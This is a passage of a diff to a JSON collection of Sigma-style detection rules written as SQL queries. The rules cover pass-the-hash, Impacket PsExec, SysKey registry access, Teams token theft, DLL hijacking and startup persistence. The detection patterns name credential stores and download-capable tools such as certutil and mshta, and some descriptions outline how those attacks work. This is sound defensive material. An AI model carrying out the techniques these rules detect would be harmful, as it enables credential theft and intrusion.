NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM 
logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_mal_service_installs.yml" }, { - "title": "Office Macro File Download", - "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", - "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Network Access Suspicious desktop.ini Action", + "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Tim Shelton (HAWK.IO)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate macro files downloaded from the internet", - "Legitimate macro files sent as attachemnts via emails" + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\HxOutlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR 
TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_macro_files_downloaded.yml" + "filename": "win_security_net_share_obj_susp_desktop_ini.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "Pass the Hash Activity 2", + "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "status": "stable", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE 
'%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_pass_the_hash_2.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", - "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Pcap Drivers", + "id": "7b687634-ab20-11ea-bb37-0242ac130002", + "status": "test", + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "author": "Cian Heasley", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR 
TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_pcap_drivers.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": 
"d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR 
(NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 
'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "TeamViewer Remote Session", - "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", "status": "test", - "description": "Detects the creation of log files during a TeamViewer remote session", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "falsepositives": [ - "Legitimate uses of TeamViewer in an organisation" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\'))" - ], - "filename": "file_event_win_susp_teamviewer_remote_session.yml" - }, - { - "title": "Creation Of Non-Existent System DLL", - "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", - "status": "experimental", - "description": "Detects the creation of system dlls that are not present on the system. 
Usually to achieve dll hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.credential_access", + "attack.t1003", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_create_non_existent_dlls.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", - "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron 
Systems)", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "title": "Account Tampering - Suspicious Failed Logon Reasons", + "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Unknown" + "User using a disabled account" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE 
(TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_susp_failed_logon_reasons.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1547.001" + "attack.t1053.005" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + 
